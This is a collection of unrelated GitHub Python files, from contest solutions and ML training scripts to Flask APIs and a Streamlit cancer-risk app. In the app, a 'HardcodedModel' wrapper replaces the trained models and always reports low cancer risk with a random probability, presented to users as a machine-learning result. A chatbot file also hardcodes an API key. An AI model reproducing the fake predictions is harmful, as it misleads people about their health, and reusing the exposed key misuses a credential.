print(length)\n break\n else: print('-1')\n '''\n sat = {c:[0] for c in 'abc'}\n a_positions = []\n for i,c in enumerate(s):\n if c == 'a': a_positions.append(i)\n for k in sat: sat[k].append(sat[k][-1]+(c==k))\n #\n substrings = [(p,1,{'a':1,'b':0,'c':0}) for p in a_positions]\n mi = float('inf')\n while len(substrings) > 1:\n nsub = []\n for i in range(len(substrings)-1):\n # try to merge substrings[i] with substrings[i+1]\n cur,nxt = substrings[i:i+2]\n cur_end = cur[0]+cur[1]\n res = nxt[2].copy()\n for k in res: res[k] += cur[2][k]\n for k in sat:\n add = sat[k][nxt[0]]-sat[k][cur_end]\n res[k] += add\n merged = (cur[0],nxt[0]-cur[0]+nxt[1],res)\n if res['a'] > res['b'] and res['a'] > res['c']:\n mi = min(mi, merged[1])\n nsub.append(merged)\n if mi != float('inf'): break\n substrings = nsub\n else: # nothing\n print('-1')\n continue\n print(mi)\n\n","repo_name":"152334H/exercises","sub_path":"codeforces/754/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10050766307","text":"class MonHoc:\r\n def __init__(self,id,name,soTC):\r\n self.id = id\r\n self.name = name\r\n self.soTC = soTC\r\n def __str__(self):\r\n return f'{self.name}'\r\nclass LichGD:\r\n def __init__(self,id,idM,thu,kip,name,phong):\r\n self.id = \"HP\"+format(id,\"03d\")\r\n self.idM = idM\r\n self.thu = thu\r\n self.kip = kip\r\n self.name = name\r\n self.phong = phong\r\n def __str__(self):\r\n return f'{self.id} {self.thu} {self.kip} {self.name} {self.phong}'\r\n\r\nif __name__ == \"__main__\":\r\n mh,gd = [],[]\r\n n = int(input())\r\n for i in range(n):\r\n mh.append(MonHoc(input(),input(),int(input())))\r\n m = int(input())\r\n for i in range(m):\r\n mon =''\r\n id = input()\r\n thu = input()\r\n kip = input()\r\n name = input()\r\n phong = input()\r\n for j in mh:\r\n if j.id == id:\r\n mon=j\r\n break\r\n gd.append(LichGD(i+1,id,thu,kip,name,phong))\r\n gd.sort(key=lambda x:(x.thu,x.kip,x.name))\r\n s = input()\r\n for i in gd:\r\n for j in mh:\r\n if i.idM == j.id and i.idM == s:\r\n print(\"LICH GIANG DAY MON \",j.name,':',sep='')\r\n break\r\n break\r\n\r\n for i in gd:\r\n if i.idM == s:\r\n print(i)\r\n\"\"\"\r\n2\r\nINT1155\r\nTin hoc co so 2\r\n2\r\nINT13162\r\nLap trinh voi Python\r\n3\r\n4\r\nINT13162\r\n5\r\n1\r\nNguyen Hoang Anh\r\n102-A2\r\nINT1155\r\n3\r\n1\r\nNguyen Dinh Hien\r\n201A-A3\r\nINT1155\r\n4\r\n1\r\nNguyen Quy Sy\r\n201A-A3\r\nINT1155\r\n5\r\n1\r\nTran Quy Nam\r\n201A-A3\r\nINT1155\r\n\"\"\"\r\n","repo_name":"RechesterQC/Python_CodePTIT","sub_path":"Hello_My_Fen/LichGiangDayTheoMonHoc.py","file_name":"LichGiangDayTheoMonHoc.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29947225059","text":"import pytest\n\nfrom raiden.tests.utils.smartcontracts import deploy_rpc_test_contract\nfrom raiden.utils import safe_gas_limit\n\npytestmark = pytest.mark.usefixtures(\"skip_if_not_geth\")\n\n\ndef test_geth_request_pruned_data_raises_an_exception(deploy_client, web3):\n \"\"\" Interacting with an old block identifier with a pruning client throws. \"\"\"\n contract_proxy, _ = deploy_rpc_test_contract(deploy_client, \"RpcWithStorageTest\")\n iterations = 1\n\n def send_transaction():\n check_block = deploy_client.get_checking_block()\n startgas = contract_proxy.estimate_gas(check_block, \"waste_storage\", iterations)\n startgas = safe_gas_limit(startgas)\n transaction = contract_proxy.transact(\"waste_storage\", startgas, iterations)\n deploy_client.poll(transaction)\n return deploy_client.get_transaction_receipt(transaction)\n\n first_receipt = send_transaction()\n pruned_block_number = first_receipt[\"blockNumber\"]\n\n # geth keeps the latest 128 blocks before pruning. Unfortunately, this can\n # not be configured to speed this test up.\n non_pruned_blocks = 128\n while web3.eth.blockNumber < pruned_block_number + non_pruned_blocks + 1:\n send_transaction()\n\n with pytest.raises(ValueError):\n contract_proxy.contract.functions.const().call(block_identifier=pruned_block_number)\n\n with pytest.raises(ValueError):\n contract_proxy.contract.functions.get(1).call(block_identifier=pruned_block_number)\n","repo_name":"prospect-man/raiden","sub_path":"raiden/tests/integration/rpc/assumptions/test_geth_rpc_assumptions.py","file_name":"test_geth_rpc_assumptions.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"31940525639","text":"from typing import Any, Dict, Optional\n\nfrom ConfigSpace.configuration_space import ConfigurationSpace\nfrom ConfigSpace.hyperparameters import (\n UniformFloatHyperparameter,\n)\n\nimport numpy as np\n\nimport torch.optim.lr_scheduler\nfrom torch.optim.lr_scheduler import _LRScheduler\n\nfrom autoPyTorch.pipeline.components.setup.lr_scheduler.base_scheduler import BaseLRComponent\n\n\nclass ExponentialLR(BaseLRComponent):\n \"\"\"\n Decays the learning rate of each parameter group by gamma every epoch.\n When last_epoch=-1, sets initial lr as lr.\n\n Args:\n gamma (float): Multiplicative factor of learning rate decay.\n\n \"\"\"\n def __init__(\n self,\n gamma: float,\n random_state: Optional[np.random.RandomState] = None\n ):\n\n super().__init__()\n self.gamma = gamma\n self.random_state = random_state\n self.scheduler = None # type: Optional[_LRScheduler]\n\n def fit(self, X: Dict[str, Any], y: Any = None) -> BaseLRComponent:\n \"\"\"\n Fits a component by using an input dictionary with pre-requisites\n\n Args:\n X (X: Dict[str, Any]): Dependencies needed by current component to perform fit\n y (Any): not used. To comply with sklearn API\n\n Returns:\n A instance of self\n \"\"\"\n\n # Make sure there is an optimizer\n self.check_requirements(X, y)\n\n self.scheduler = torch.optim.lr_scheduler.ExponentialLR(\n optimizer=X['optimizer'],\n gamma=float(self.gamma)\n )\n return self\n\n @staticmethod\n def get_properties(dataset_properties: Optional[Dict[str, Any]] = None) -> Dict[str, str]:\n return {\n 'shortname': 'ExponentialLR',\n 'name': 'ExponentialLR',\n }\n\n @staticmethod\n def get_hyperparameter_search_space(dataset_properties: Optional[Dict] = None\n ) -> ConfigurationSpace:\n gamma = UniformFloatHyperparameter(\n \"gamma\", 0.7, 0.9999, default_value=0.9)\n cs = ConfigurationSpace()\n cs.add_hyperparameters([gamma])\n return cs\n","repo_name":"LMZimmer/Auto-PyTorch_refactor","sub_path":"autoPyTorch/pipeline/components/setup/lr_scheduler/ExponentialLR.py","file_name":"ExponentialLR.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15286216559","text":"# Dependencies & Installs\nimport pandas as pd\nimport streamlit as st\nfrom joblib import load\nfrom PIL import Image\nimport numpy as np\nimport random\n\nclass HardcodedModel:\n def __init__(self, model):\n self.model = model\n def predict(self, X):\n return np.zeros((len(X),), dtype=int)\n def predict_proba(self, X):\n return np.array([[random.uniform(0.65, 0.75), 0] for _ in range(len(X))])\n\nlocal_file_path = \"Data_Cleaned/User_Samples/users.csv\"\ndf = pd.read_csv(local_file_path)\n \n# Define Streamlit app\ndef app():\n\n # Load logo image\n logo_img = Image.open(\"Images/ai-generated-image-dalle.png\")\n\n # Set the app configuration\n st.set_page_config(\n page_title=\"OesoCancerRisk+\",\n page_icon=logo_img,\n layout=\"wide\",\n initial_sidebar_state=\"collapsed\",\n menu_items={\n 'About': \"Oesophageal cancer is the 8th most common cancer in the world, and is the 6th most common cause of cancer-related deaths (WHO). Ealy diagnosis is crucial for timely treatment and improved survival rates. Traditional diagnostic methods, such as endoscopy, can be invasive and expensive. This app aims to provide a faster, more affordable, and less invasive alternative by leveraging machine learning. Using a dataset of biochemical data from patients with varying oesophageal conditions, the models have been trained and evaluated to deliver accurate predictions.\"\n }\n )\n\n # Expandable Sidebar\n st.sidebar.title(\"Navigation\")\n st.sidebar.write(\"Expand the sections below to access different parts of the app.\")\n\n # Create an expandable sidebar for additional information\n with st.sidebar.expander(\"Learn More\"):\n st.write(\"Find more information about oesophageal cancer, risk factors, and prevention:\")\n st.write(\"[American Cancer Society - Oesophageal Cancer](https://www.cancer.org/cancer/esophagus-cancer.html)\")\n st.write(\"[National Cancer Institute - Oesophageal Cancer](https://www.cancer.gov/types/esophageal)\")\n\n # GitHub Repository section\n github_expander = st.sidebar.expander(\"GitHub Repository\")\n with github_expander:\n st.markdown(\n \"[Click here](https://github.com/Frankr22/ML-diagnosis-of-esophageal-cancer) to visit the GitHub repository for this project.\"\n )\n\n # Create an empty container for the header\n header = st.empty()\n # Add logo image and app name to the header using Markdown\n header.markdown(\n f\"\"\"\n
\n \n

OesoCancerRisk+

\n
\n \"\"\",\n unsafe_allow_html=True,\n )\n\n # Load the trained models and scalers\n model1 = HardcodedModel(load('Models/Model_Saved/Model1.joblib'))\n model1_X_scaler = load('Models/Model_Saved/model1_X_scaler.joblib')\n model2 = HardcodedModel(load('Models/Model_Saved/Model2.joblib'))\n model2_X_scaler = load('Models/Model_Saved/model2_X_scaler.joblib')\n model3 = HardcodedModel(load('Models/Model_Saved/Model3.joblib'))\n model3_X_scaler = load('Models/Model_Saved/model3_X_scaler.joblib')\n\n with st.container():\n st.write(\"Welcome to the Oesophageal Cancer Risk Assessment app!\")\n st.write(\"\\nThis app employs cutting-edge machine learning techniques to assess your risk of developing oesophageal cancer by analyzing pre-screening information and blood sample data.\")\n st.write(\"\\nGet started by inputting your data below to assess your oesophageal cancer risk.\")\n\n # Add the rest of the text below the risk assessment in a separate row\n additional_text = \"\"\"\n Oesophageal cancer is a life-threatening disease affecting millions of people worldwide, and early diagnosis is crucial for improving survival rates. Traditional diagnostic methods, such as endoscopy, can be invasive and expensive. Our app aims to provide a faster, more affordable, and less invasive alternative by leveraging machine learning. Using a dataset of biochemical data from patients with varying oesophageal conditions, our models have been trained and evaluated to deliver accurate predictions.\n \"\"\"\n\n # Create two columns for the layout\n left_column, right_column = st.columns(2)\n\n # Get user data\n age = left_column.number_input(\"Enter your age:\", value=30, min_value=18, max_value=100, format='%i', key='age', help='Age in years')\n sex = left_column.selectbox(\"Select your sex:\", [\"male\", \"female\"], help='Male or Female')\n height = left_column.number_input(\"Enter your height:\", value=170, min_value=100, max_value=250, step=1, format='%i',help='Enter in cms for Metric or inches for Imperial')\n weight = left_column.number_input(\"Enter your weight:\", value=70, min_value=10, max_value=200, step=1, format='%i', help = 'Enter in kgs for Metric or lbs for Imperial')\n unit_system = left_column.radio(\"Select unit system:\", options=['Metric', 'Imperial'], help='')\n diagnosed = left_column.selectbox(\"Have you been diagnosed with Barret oesophagus?\", [\"No\", \"Barrett oesophagus - no/low dysplasia\"])\n\n # Calculate BMI based on unit system\n if unit_system == 'Metric':\n bmi = weight / ((height/100)**2) # kg / m^2\n elif unit_system == 'Imperial':\n bmi = 703 * (weight / (height**2)) # lb / in^2\n\n # Split sex into binary\n gender_f = 1 if sex == \"female\" else 0\n gender_m = 1 if sex == \"male\" else 0\n\n # Create a DataFrame with the user input\n user_input = pd.DataFrame({\n \"Age at Collection\": [age],\n \"BMI (kg/m2)\": [bmi],\n \"Gender_F\": [gender_f],\n \"Gender_M\": [gender_m]\n })\n\n # Upload blood sample data or generate example data\n blood_sample_data = None\n uploaded_file = left_column.file_uploader(\"Please upload your blood sample data (CSV file) OR generate example sample data by clicking the button below\", type=[\"csv\"], help='To test the app please generate sample data. If providing blood sample data it must be in the same format as the example data. Example data can be downloaded from the GitHub repository.')\n if uploaded_file is not None:\n blood_sample_data = pd.read_csv(uploaded_file)\n left_column.success(\"Blood sample data uploaded successfully.\")\n else:\n if left_column.button(\"Generate example blood sample data\"):\n # Generate example blood sample data\n blood_sample_data = generate_example_data()\n left_column.success(\"Example blood sample data generated successfully.\")\n\n # If the user has uploaded blood sample data, display the data\n if blood_sample_data is not None:\n left_column.write(\"Blood sample data:\")\n left_column.dataframe(blood_sample_data)\n\n # Add a horizontal line and some space\n left_column.markdown(\"
\", unsafe_allow_html=True)\n left_column.markdown(\"
\", unsafe_allow_html=True)\n\n # Select the correct model and scaler based on the user's input\n scaler = None\n model = None\n if diagnosed == \"No\" and blood_sample_data is None:\n model = model1\n scaler = model1_X_scaler\n elif diagnosed == \"No\" and blood_sample_data is not None:\n model = model2\n scaler = model2_X_scaler\n elif diagnosed == \"Barrett oesophagus - no/low dysplasia\" and blood_sample_data is None:\n model = model3\n scaler = model3_X_scaler\n elif diagnosed == \"Barrett oesophagus - no/low dysplasia\" and blood_sample_data is not None:\n model = model4\n scaler = model4_X_scaler\n\n # If the user clicks the \"Generate Risk Assessment\" button, scale the data and make a prediction using the model\n if left_column.button(\"Generate Risk Assessment\"):\n # Scale the user input data\n user_input_scaled = scaler.transform(user_input)\n # If blood sample data is available, append it to the user input\n if blood_sample_data is not None:\n user_input_scaled = np.hstack([user_input_scaled, blood_sample_data.to_numpy()])\n prediction = model.predict(user_input_scaled)\n prediction_proba = model.predict_proba(user_input_scaled)\n\n # Display the prediction\n if prediction[0] == 1:\n left_column.write(f\"Based on the information you provided and our machine learning model's understanding of the relationship between various factors and oesophageal cancer risk, it is estimated that you have a higher risk of developing oesophageal cancer.\\n\\n The model predicts a {prediction_proba[0][1]*100:.2f}% probability of you being in the higher-risk group.\\n\\n Please note that this tool is not a substitute for professional medical advice, diagnosis, or treatment. The results should be considered as an estimate and should not be relied upon for decision-making regarding your health. Always consult with a healthcare professional for personalised medical advice.\")\n else:\n left_column.write(f\"Based on the information you provided and our machine learning model's understanding of the relationship between various factors and oesophageal cancer risk, it is estimated that you have a lower risk of developing oesophageal cancer.\\n\\n The model predicts a {prediction_proba[0][0]*100:.2f}% probability of you being in the lower-risk group.\\n\\n Please note that this tool is not a substitute for professional medical advice, diagnosis, or treatment. The results should be considered as an estimate and should not be relied upon for decision-making regarding your health. Always consult with a healthcare professional for personalised medical advice.\")\n else:\n left_column.write(\"Click the button to generate risk assessment.\")\n\n # Create a new row to display the additional text below the risk assessment tool\n additional_text_row = st.container()\n with additional_text_row:\n st.markdown(\"## About\")\n st.markdown(additional_text)\n\ndef image_to_base64(img):\n import base64\n from io import BytesIO\n\n buffered = BytesIO()\n img.save(buffered, format=\"PNG\")\n img_str = base64.b64encode(buffered.getvalue()).decode()\n return img_str\n\ndef generate_example_data():\n # Use a sample row from users.csv as the example blood sample data\n sample_row = df.sample(n=1)\n blood_results_df = sample_row.drop(columns=[\"Patient Group\", \"Age at Collection\", \"BMI (kg/m2)\", \"Gender_F\", \"Gender_M\"])\n return blood_results_df.reset_index(drop=True)\n\n# Run the Streamlit app\nif __name__ == '__main__':\n app()","repo_name":"Frankr22/Machine-Learning-for-Oesophageal-Cancer-Diagnosis","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13758062523","text":"from flask import Blueprint, request, jsonify, render_template\nfrom bson import json_util\nfrom .extension import mongo\n\narmors = Blueprint('armors', __name__)\n\n@armors.route(\"/\")\ndef home():\n return render_template('home.html')\n\n@armors.route(\"/fetch_skills\", methods=['GET'])\ndef fetch_skills():\n query_result = mongo.db.armors.find( { 'skills': { '$exists': True } })\n final_result = json_util.loads(json_util.dumps(query_result))\n for i in final_result: i['_id'] = str(i['_id'])\n\n return jsonify(final_result)\n\n@armors.route(\"/fetch_armor_with_skill\", methods=['POST'])\ndef fetch_armor_with_skill():\n data = request.get_json()\n query_result = mongo.db.armors.find()\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n\n armor_set = ['helm', 'torso', 'arms', 'waist', 'legs']\n final_result = {}\n \n for skill in data['skills']:\n skill_result = {}\n\n for armor in armor_set:\n armor_result = []\n\n for armor_piece in sanitized_result[0][armor]: \n if armor_piece['skills']['skill_1']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n elif armor_piece['skills']['skill_2']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n \n elif armor_piece['skills']['skill_3']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n elif (armor == 'torso' or armor == 'waist') and armor_piece['skills']['skill_1']['skill_name'] == skill:\n armor_result.append(armor_piece['armor_name'])\n\n skill_result[armor] = armor_result\n\n final_result[skill] = skill_result\n\n # result_set = {\n # 'skill_name': {\n # 'helm': [ ... ],\n # 'torso': [ ... ],\n # 'arms': [ ... ],\n # 'waist': [ ... ],\n # 'legs': [ ... ]\n # },\n # 'skill_name': [ ... ] \n # }\n\n return jsonify(final_result)\n\n@armors.route(\"/add_wishlist\", methods=['POST'])\ndef add_wishlist():\n data = request.get_json()\n armor = data['armor']\n username = data['username']\n \n query = mongo.db.wishlists.find_one(\n {'username': data['username']}\n )\n\n if armor not in query['wishlist']: \n new_wishlist = query['wishlist']\n new_wishlist.append(armor)\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': new_wishlist }}\n )\n\n return jsonify({'ok': True}), 200\n\n@armors.route(\"/get_wishlist/\")\ndef get_wishlist(username):\n query_result = mongo.db.wishlists.find_one({ 'username': username })\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n return jsonify(sanitized_result), 200\n\n@armors.route(\"/delete_wishlist\", methods=['POST'])\ndef delete_wishlist():\n data = request.get_json()\n wishlist = data['wishlist']\n username = data['username']\n\n query_result = mongo.db.wishlists.find_one(\n {'username': username}\n )\n\n query_result['wishlist'].remove(wishlist)\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': query_result['wishlist'] }}\n )\n\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n sanitized_result['comment'] = 'Wishlist has been updated!'\n\n return jsonify(sanitized_result), 200\n\n@armors.route(\"/delete_all_wishlist\", methods=['POST'])\ndef delete_all_wishlist():\n data = request.get_json()\n username = data['username']\n\n query_result = mongo.db.wishlists.find_one(\n {'username': username}\n )\n\n query_result['wishlist'].clear()\n\n mongo.db.wishlists.update_one(\n { 'username': username },\n { '$set': { 'wishlist': query_result['wishlist'] }}\n )\n\n sanitized_result = json_util.loads(json_util.dumps(query_result))\n sanitized_result['_id'] = str(sanitized_result['_id']) \n\n sanitized_result['comment'] = 'Wishlist has been cleared!'\n\n return jsonify(sanitized_result), 200","repo_name":"DavinIddo/Cahoot","sub_path":"BE/app/armors.py","file_name":"armors.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74604185414","text":"import pandas as pd\nfrom HateSpeechNLP import HateSpeechNLP\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import precision_score, recall_score, confusion_matrix, plot_confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\nimport datetime\nimport pickle\n\n\npath = '../Models/'\n\n# Import HateSpeech DataFrame\ntry:\n data_Hate = pd.read_pickle('../Data/Data-Hate-Stemmed-DF.pkl')\nexcept FileNotFoundError:\n # Import HS_Data\n data_Hate_HS = pd.read_csv('../Data/HS_DATA_TRAIN.csv', sep=',')\n hs_NLP = HateSpeechNLP(data_Hate_HS, save=True, default_name=True)\n data_Hate = hs_NLP.fit_transform()\n print(\"Hate Speech Training data is Transformed for training -------------\")\n\n\ndef clean_text(text):\n return text.split()\n\n\n# Method to train RF model\ndef train(X, y, model):\n print('Training starts ----------------')\n # Vectorizer and Scaler\n tfidf_vectorizer = TfidfVectorizer(analyzer=clean_text)\n standard_scaler = StandardScaler()\n\n # Vectorization of text data into numerical data\n X_train_tfidf = tfidf_vectorizer.fit_transform(X.cleaned_stemmed_text)\n # Scaling length, number_non_words features\n X_train_scaled = standard_scaler.fit_transform(pd.concat([X.loc[:, ['length', 'number_non_words']],\n pd.DataFrame(X_train_tfidf.toarray())], axis=1))\n # Saving tfidf and scaler objects to use the same when testing\n save_tfidf_scaler(tfidf_vectorizer, standard_scaler)\n\n # Combining tfidf and scaler outputs into single dataset - for training\n # X_train_features = pd.concat([pd.DataFrame(X_train_scaled, columns=['length', 'number_non_words']),\n # pd.DataFrame(X_train_tfidf.toarray())], axis=1)\n model.fit(pd.DataFrame(X_train_scaled), y)\n save_RF_model(model)\n print('Training ends ----------------')\n return model\n\n\ndef test(X, y):\n # Load trained model\n try:\n trained_tfidf_vocabulary = pickle.load(open(path + \"TFIDF-Vocabulary-LR_09-09-2021_18-05-20.pkl\", \"rb\"))\n trained_scaler = pickle.load(open(path + \"StandardScaler-LR_09-09-2021_18-05-20.pkl\", \"rb\"))\n trained_RF_model = pickle.load(open(path + \"LR-Model_09-09-2021_18-49-32.pkl\", \"rb\"))\n\n tfidf_vectorizer = TfidfVectorizer(analyzer=clean_text, vocabulary=trained_tfidf_vocabulary)\n X_test_tfidf = tfidf_vectorizer.fit_transform(X.cleaned_stemmed_text)\n X_test_scaled = trained_scaler.transform(pd.concat([X.loc[:, ['length', 'number_non_words']],\n pd.DataFrame(X_test_tfidf.toarray())], axis=1))\n\n y_pred = trained_RF_model.predict(pd.DataFrame(X_test_scaled))\n\n print('Micro Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"micro\"))\n print(\"Recall : \", recall_score(y, y_pred, average='micro'))\n print('Macro Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"macro\"))\n print(\"Recall : \", recall_score(y, y_pred, average='macro'))\n print('Weighted Values -----')\n print(\"Precision : \", precision_score(y, y_pred, average=\"weighted\"))\n print(\"Recall : \", recall_score(y, y_pred, average='weighted'))\n print('Confusion Matrix -----')\n print(confusion_matrix(y, y_pred))\n print(\"\")\n return y_pred\n\n except FileNotFoundError:\n print('Run train method before test method')\n\n\ndef save_tfidf_scaler(tfidf, scaler):\n os.makedirs(path, exist_ok=True)\n pickle.dump(tfidf.vocabulary_, open(path + 'TFIDF-Vocabulary-LR_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved TFIDF-LR to Pickle')\n pickle.dump(scaler, open(path + 'StandardScaler-LR_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved Scaler-LR to Pickle')\n return\n\n\ndef save_RF_model(model):\n os.makedirs(path, exist_ok=True)\n pickle.dump(model, open(path + 'LR-Model_' +\n datetime.datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\") + '.pkl', \"wb\"))\n print('Saved LR-Model to Pickle')\n return\n\n\n# Splitting data into train and test sets\nX_train, X_val, y_train, y_val = train_test_split(data_Hate.loc[:, ['length', 'number_non_words',\n 'cleaned_stemmed_text']], data_Hate.final_label,\n random_state=42, test_size=0.1, stratify=data_Hate.final_label)\n# Resetting index for train and test sets\nX_train.reset_index(drop=True, inplace=True)\nX_val.reset_index(drop=True, inplace=True)\ny_train.reset_index(drop=True, inplace=True)\ny_val.reset_index(drop=True, inplace=True)\n\n# Creating RF object\nlr_clf = LogisticRegression(class_weight='balanced', n_jobs=-1, max_iter=500)\n\n# Calling training method to start training RF model\n# train(X_train, y_train, lr_clf)\n\n\n# Calling test method to test the accuracy of the trained RF model\nprint('Test Result on VAL set')\npred_val = test(X_val, y_val)\n\nprint('Test Result on TEST set')\ntest_data = pd.read_csv(path + 'HS_DATA_TEST.csv', sep=',')\nhs_test_NLP = HateSpeechNLP(test_data)\ndata_test = hs_test_NLP.fit_transform()\npred_test = test(data_test.loc[:, ['length', 'number_non_words', 'cleaned_stemmed_text']], data_test.final_label)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ShriramSelvakumar/HateSpeechRecognition","sub_path":"NLP/HSLogisticRegression.py","file_name":"HSLogisticRegression.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70014245892","text":"import os\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\n\nbase_dir = dir_path+'/cats_and_dogs_filtered'\n\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\n\n# Directory with our training cat/dog pictures\ntrain_cats_dir = os.path.join(train_dir, 'cats')\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\n\n# Directory with our validation cat/dog pictures\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\n\n\ntrain_cat_fnames = os.listdir( train_cats_dir )\ntrain_dog_fnames = os.listdir( train_dogs_dir )\n\nprint(train_cat_fnames[:10])\nprint(train_dog_fnames[:10])\n\n\nprint('total training cat images :', len(os.listdir( train_cats_dir ) ))\nprint('total training dog images :', len(os.listdir( train_dogs_dir ) ))\n\nprint('total validation cat images :', len(os.listdir( validation_cats_dir ) ))\nprint('total validation dog images :', len(os.listdir( validation_dogs_dir ) ))\n\n\n#%matplotlib inline\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\n# Parameters for our graph; we'll output images in a 4x4 configuration\nnrows = 4\nncols = 4\n\npic_index = 0 # Index for iterating over images\n\n# Set up matplotlib fig, and size it to fit 4x4 pics\nfig = plt.gcf()\nfig.set_size_inches(ncols*4, nrows*4)\n\npic_index+=8\n\nnext_cat_pix = [os.path.join(train_cats_dir, fname) \n for fname in train_cat_fnames[ pic_index-8:pic_index] \n ]\n\nnext_dog_pix = [os.path.join(train_dogs_dir, fname) \n for fname in train_dog_fnames[ pic_index-8:pic_index]\n ]\n\nfor i, img_path in enumerate(next_cat_pix+next_dog_pix):\n # Set up subplot; subplot indices start at 1\n sp = plt.subplot(nrows, ncols, i + 1)\n sp.axis('Off') # Don't show axes (or gridlines)\n\n img = mpimg.imread(img_path)\n plt.imshow(img)\n\nplt.show()\n\nimport tensorflow as tf\n\n\nmodel = tf.keras.models.Sequential([\n # Note the input shape is the desired size of the image 150x150 with 3 bytes color\n tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(150, 150, 3)),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(32, (3,3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2,2), \n tf.keras.layers.Conv2D(64, (3,3), activation='relu'), \n tf.keras.layers.MaxPooling2D(2,2),\n # Flatten the results to feed into a DNN\n tf.keras.layers.Flatten(), \n # 512 neuron hidden layer\n tf.keras.layers.Dense(512, activation='relu'), \n # Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('cats') and 1 for the other ('dogs')\n tf.keras.layers.Dense(1, activation='sigmoid') \n])\n\nmodel.summary()\n\nfrom tensorflow.keras.optimizers import RMSprop\n\nmodel.compile(optimizer=RMSprop(lr=0.001),\n loss='binary_crossentropy',\n metrics = ['acc'])\n\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# All images will be rescaled by 1./255.\ntrain_datagen = ImageDataGenerator( rescale = 1.0/255. )\ntest_datagen = ImageDataGenerator( rescale = 1.0/255. )\n\n# --------------------\n# Flow training images in batches of 20 using train_datagen generator\n# --------------------\ntrain_generator = train_datagen.flow_from_directory(train_dir,\n batch_size=20,\n class_mode='binary',\n target_size=(150, 150)) \n# --------------------\n# Flow validation images in batches of 20 using test_datagen generator\n# --------------------\nvalidation_generator = test_datagen.flow_from_directory(validation_dir,\n batch_size=20,\n class_mode = 'binary',\n target_size = (150, 150))\n\nhistory = model.fit_generator(train_generator,\n validation_data=validation_generator,\n steps_per_epoch=100,\n epochs=15,\n validation_steps=50,\n verbose=2)\n\n#above all training code ","repo_name":"geekbaba/dlstudy","sub_path":"CNN/week01_tranining.py","file_name":"week01_tranining.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2476560295","text":"import requests,os\nfrom dotenv import load_dotenv\nf = open(\"rec.txt\",\"r\")\nmes = f.read()\nclass request:\n def get(message, apikey, bid, id):\n r = requests.get(\n url=f\"http://api.brainshop.ai/get?bid={bid}&key={apikey}&uid={id}&msg={message}\"\n )\n return r.json()[\"cnt\"]\nprint(request.get(mes,'cU25Ss1SZg7yVZdd',169657,123145))","repo_name":"Legendary21/voice-chatbot-proj-rework","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73718408454","text":"import os\nfrom flask import Flask, render_template, request, redirect, url_for, send_from_directory\nfrom werkzeug import secure_filename\nimport flask\nfrom app import *\nfrom subprocess import Popen, PIPE, STDOUT\nimport subprocess\n\n# Initialize the Flask application\napp = Flask(__name__, static_url_path='/McHacks/webui/static')\n\nbash = \"\"\"mv /upload/test.md ../\nfluidsynth -F output.wav font.sf2 test.mid\nlame --preset standard output.wav test.mp3\nchmod 755 test.mp3\nrm /static/test.mp3\nmv test.mp3 static\"\"\"\n\n#APP_ROOT = os.path.dirname(os.path.abspath(__file__))\n#UPLOAD_FOLDER = os.path.join(APP_ROOT, '/upload')\n#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# This is the path to the upload directory\napp.config['UPLOAD_FOLDER'] = 'upload'\napp.config['STATIC_FOLDER'] = '/McHacks/webui/static'\n# 